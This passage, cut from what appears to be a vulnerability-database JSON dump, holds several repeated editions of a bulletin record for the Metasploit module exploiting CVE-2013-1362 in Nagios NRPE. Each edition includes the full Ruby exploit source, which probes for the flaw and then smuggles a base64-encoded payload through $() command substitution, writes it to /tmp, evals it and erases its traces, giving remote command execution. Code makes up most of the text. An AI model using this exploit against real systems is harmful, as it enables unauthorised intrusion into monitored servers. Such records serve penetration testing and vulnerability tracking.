|`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-06T09:01:25", "differentElements": ["modified", "published"], "edition": 44}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-06T10:58:24", "history": [], "viewCount": 79, "enchantments": {"score": {"value": 6.0, "modified": "2018-03-06T10:58:24"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-06T10:58:24", "differentElements": ["modified", "published"], "edition": 45}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-12T13:14:35", "history": [], "viewCount": 79, "enchantments": {"score": {"value": 6.0, "modified": "2018-03-12T13:14:35"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-12T13:14:35", "differentElements": ["modified", "published"], "edition": 46}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-12T15:23:42", "history": [], "viewCount": 79, "enchantments": {"score": {"value": 6.0, "modified": "2018-03-12T15:23:42"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-12T15:23:42", "differentElements": ["modified", "published"], "edition": 47}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-16T11:44:05", "history": [], "viewCount": 79, "enchantments": {"score": {"value": 6.0, "modified": "2018-03-16T11:44:05"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-16T11:44:05", "differentElements": ["modified", "published"], "edition": 48}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central 